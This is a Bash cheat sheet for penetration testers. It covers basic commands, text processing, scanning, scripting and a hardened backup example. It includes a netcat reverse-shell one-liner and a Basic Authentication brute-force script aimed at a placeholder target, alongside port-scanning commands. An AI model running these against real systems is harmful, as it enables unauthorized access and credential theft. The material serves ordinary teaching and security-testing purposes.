Bash

Bash (Bourne Again SHell) is a powerful command-line interface and scripting language used widely in UNIX-like operating systems. It is essential for security professionals and penetration testers to harness the full potential of Bash for tasks such as automation, information gathering, and exploitation. This cheat sheet provides quick references and examples for using Bash effectively.

Basic Commands

File and Directory Operations

  • List files and directories: ls

  • Change directory: cd /path/to/directory

  • Create a directory: mkdir /path/to/directory

  • Remove a directory: rmdir /path/to/directory

  • Copy files: cp /path/to/source /path/to/destination

  • Move/Rename files: mv /path/to/source /path/to/destination

  • Delete files: rm /path/to/file

File Content Operations

  • View file content: cat /path/to/file

  • View file content page by page: less /path/to/file

  • Search inside files: grep 'search_term' /path/to/file

  • Count lines, words, and characters in a file: wc /path/to/file

Permissions

  • Change file permissions: chmod 755 /path/to/file

  • Change file ownership: chown user:group /path/to/file


Text Processing

awk

  • Print the first column: awk '{print $1}' file

  • Print specific columns: awk '{print $1, $3}' file

  • Pattern matching and printing: awk '/pattern/ {print $1}' file

sed

  • Substitute text in a file: sed 's/old/new/g' file

  • Delete lines matching a pattern: sed '/pattern/d' file

grep

  • Search for a pattern in files: grep 'pattern' file

  • Recursive search in directories: grep -r 'pattern' /path/to/directory

cut

  • Extract columns: cut -d':' -f1 /etc/passwd

sort

  • Sort lines in a file: sort file

uniq

  • Remove adjacent duplicate lines: uniq file (sort first to drop all duplicates: sort file | uniq)

tr

  • Translate or delete characters: tr 'a-z' 'A-Z' < file


Network Operations

Network Scanning

  • Ping a host: ping -c 4 host

  • Scan open ports with netcat: nc -zv host 1-65535

  • Network enumeration with nmap: nmap -A host

File Transfers

  • Download a file with wget: wget http://example.com/file

  • Upload a file with curl: curl -T file ftp://example.com

Network Connections

  • Establish a TCP connection: nc host port

  • Open a reverse shell: nc -e /bin/bash host port


System Monitoring

Process Management

  • List running processes: ps aux

  • Terminate a process: kill PID

  • Force terminate a process: kill -9 PID

Disk Usage

  • Check disk space usage: df -h

  • Check directory size: du -sh /path/to/directory

Memory Usage

  • Check memory usage: free -h


Scripting Essentials

Variables

  • Define a variable: VAR_NAME="value"

  • Access a variable: "$VAR_NAME" (quote the expansion to prevent word splitting and globbing)

Conditionals

if [ condition ]; then
  # commands
elif [ condition ]; then
  # commands
else
  # commands
fi

Loops

  • For loop:

for item in list; do
  # commands
done

  • While loop:

while [ condition ]; do
  # commands
done

Functions

function_name() {
  # commands
}

Practical Examples

Basic Port Scan

#!/bin/bash
for port in {1..65535}; do
  timeout 1 bash -c "echo > /dev/tcp/127.0.0.1/$port" 2>/dev/null && echo "Port $port is open"
done

Directory Backup

#!/bin/bash
SOURCE="/path/to/source"
DEST="/path/to/destination/backup-$(date +%F).tar.gz"
# Quote both variables so paths containing spaces are not split into separate arguments
tar -czvf "$DEST" "$SOURCE"

Log Parsing

#!/bin/bash
grep "ERROR" /var/log/syslog | awk '{print $1, $2, $5}'

Basic Authentication Brute Force

#!/bin/bash
for user in $(cat users.txt); do
  for pass in $(cat passwords.txt); do
    response=$(curl -s -o /dev/null -w "%{http_code}" -u "$user:$pass" http://target)
    if [ "$response" -eq 200 ]; then
      echo "Valid credentials: $user:$pass"
    fi
  done
done

Security Tips

  • Use absolute paths in scripts to avoid unexpected behaviors.

  • Validate inputs to prevent injection attacks.

  • Limit permissions and use sudo sparingly.

  • Log and monitor script activities.

  • Encrypt sensitive data in scripts.
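
The Directory Backup script reworked to apply four of the tips above (added example, not part of the original cheat sheet). It pins PATH to a fixed value in place of spelling out each command's absolute path, requires an absolute source path, validates input against an allow-list, sets a restrictive umask, and writes an audit log. The BACKUP_ROOT and LOG_FILE defaults are hypothetical.

```bash
#!/bin/bash
# Added example: hardened variant of the Directory Backup script.
# BACKUP_ROOT and LOG_FILE defaults are hypothetical; adjust for your host.
set -u
PATH=/usr/sbin:/usr/bin:/sbin:/bin; export PATH  # fixed search path, no hijack via $PATH
umask 077                                        # archives and logs are owner-only

BACKUP_ROOT="${BACKUP_ROOT:-/var/backups/demo}"
LOG_FILE="${LOG_FILE:-/var/log/demo-backup.log}"

# Append a timestamped audit line; fall back to stderr if the log is unwritable.
log() {
  line="$(date '+%Y-%m-%dT%H:%M:%S') $*"
  { printf '%s\n' "$line" >>"$LOG_FILE"; } 2>/dev/null || printf '%s\n' "$line" >&2
}

# Allow-list validation: absolute path, conservative characters, no "..".
valid_path() {
  case "$1" in
    /*) ;;
    *) return 1 ;;
  esac
  case "$1" in
    *[!A-Za-z0-9._/-]*) return 1 ;;   # spaces, ';', '$', backticks, newlines
    */../*|*/..) return 1 ;;          # parent-directory traversal
  esac
  return 0
}

# Archive one directory; prints the archive path on success.
backup_dir() {
  src="$1"
  if ! valid_path "$src" || [ ! -d "$src" ]; then
    # Neutralise unexpected bytes before logging so input cannot forge log lines.
    log "REJECT source=$(printf '%s' "$src" | tr -c 'A-Za-z0-9._/-' '?')"
    return 2
  fi
  dest="$BACKUP_ROOT/backup-$(date +%F).tar.gz"
  mkdir -p -- "$BACKUP_ROOT" || return 1
  # Quoted variables and "--" keep the path from being split or read as an option.
  if tar -czf "$dest" -- "$src" 2>/dev/null; then
    log "OK source=$src dest=$dest"
    printf '%s\n' "$dest"
  else
    log "FAIL source=$src dest=$dest"
    return 1
  fi
}
```

Source the file and call backup_dir with an absolute directory path; a return status of 2 means the input was rejected before tar ran.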
